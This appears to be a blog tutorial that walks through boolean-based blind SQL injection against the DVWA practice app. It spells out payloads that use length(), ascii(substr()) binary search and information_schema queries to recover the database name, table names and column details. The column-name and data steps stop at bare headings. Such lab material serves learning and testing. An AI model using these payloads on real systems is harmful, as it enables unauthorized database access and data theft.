SQL blind injection: the result of the injected query cannot be seen on the page.
You cannot observe how the SQL executed, or even directly whether it executed at all.
Blind injection is therefore comparatively complex.
I. Boolean-based blind injection at security level LOW: finding the injection point and determining its type
1. PHP code analysis
The code first checks whether a User ID was submitted. If so, it assigns the value to id, queries the database with it and stores the result in result. It then takes the number of rows in the result set: if it is greater than 0, it prints that the User ID exists in the database; otherwise it sends a response header and prints that the User ID is missing from the database. Finally it closes the connection.
2. Functions used
mysqli_num_rows(): returns the number of rows in a result set; that row count is the only thing the page reveals about the query
header(): sends a raw HTTP response header, used on the "missing" branch
3. Hands-on
(1) Check whether an injection point exists
If the page still answers with the "User ID exists" message for the injected input, there is an injection point.
(2) Determine whether the injection is numeric or string-based
Both test inputs can still be looked up, which means the injection is not numeric;
so it is string-based.
II. Guessing the database name
1. Guess the length of the database name
1' and length(database())=1#
1' and length(database())=2#
1' and length(database())=3#
1' and length(database())=4#
The last payload returns "exists",
so the database name is 4 characters long.
2. Guess the database name character by character with binary search
(1) Binary search
(2) Substring function
(3) ASCII code comparison
ascii() returns the ASCII code of a character
65-90 is A-Z
97-122 is a-z
substr() extracts part of a string
substr(database(),1,1) takes a slice of the database name and returns its first character
(the first 1 means start at the 1st character, the second 1 means take one character)
substr(database(),2,1) returns the second character
(1) 1' and ascii(substr(database(),1,1))>97#
compares against the lowest lowercase letter, a
(2) 1' and ascii(substr(database(),1,1))<122#
Both return "exists", so the first character is a lowercase letter after a: it is b at the earliest. Now narrow it down by repeated halving.
Binary search: a-z is 26 characters; halve it (13) and test around the midpoint of 97..122, which is 109.
(3) 1' and ascii(substr(database(),1,1))>109#
Returns "missing", so the character is at most 109. Halve 13 to 6: 97+6 = 103
1' and ascii(substr(database(),1,1))>103#
Still "missing". Halve 6 to 3: 97+3 = 100
1' and ascii(substr(database(),1,1))>100#
Still "missing". Halve 3 to 1: 97+1 = 98
1' and ascii(substr(database(),1,1))>98#
Returns "exists", so it is greater than 98.
1' and ascii(substr(database(),1,1))>99#
Returns "exists", so it is greater than 99 but not greater than 100.
The first character's ASCII code is therefore 100; d has ASCII code 100, so the first character is d.
Guess the remaining characters the same way; the result is dvwa.
3. Guess how many tables the database has
1' and (select count(table_name) from information_schema.tables where table_schema=database())#
Because the output is blind, the count has to be tested against candidate values one at a time:
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#
The second returns "exists", so there are 2 tables.
4. Guess the length of each table name (1' and length(substr(query,1))=1#)
Query: select table_name from information_schema.tables where table_schema=database() limit 0,1. Without the limit it would return two rows; limit 0,1 keeps only the first, so the statement returns the name of the first table in the current database.
In limit 0,1, the 0 means start from the 1st record and the 1 means return one record.
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)
(substr(...,1) with no length argument returns the whole name, so length() around it is simply the length of the table name.)
The complete SQL statement is:
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1#
After repeated attempts, the table name turns out to be 9 characters long:
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#
5. Guess the table name character by character (binary search)
ascii(): returns the ASCII code of a single character
substr(table-name expression,1,1): starting at the 1st character of the table name, take 1 character
The expression that returns the table name: (select table_name from information_schema.tables where table_schema=database() limit 0,1)
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))
So the SQL statements are:
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=97#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>98#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>99#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109#
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103#
Testing shows the first character of the table name has ASCII value 103, i.e. g; since the name is 9 characters long, the guess is guestbook, which was confirmed:
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#
6. Guess the number of columns
1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=1#
1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=3#
The second returns "exists", so there are 3 columns.
7. Guess the length of each column name
(Note that these payloads query the users table rather than guestbook.)
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#
The second returns "exists", so the first column name is 7 characters long.
8. Guess the column names
9. Guess the data
This article covered SQL blind injection. Likes and bookmarks are welcome; your support is the greatest motivation for my writing!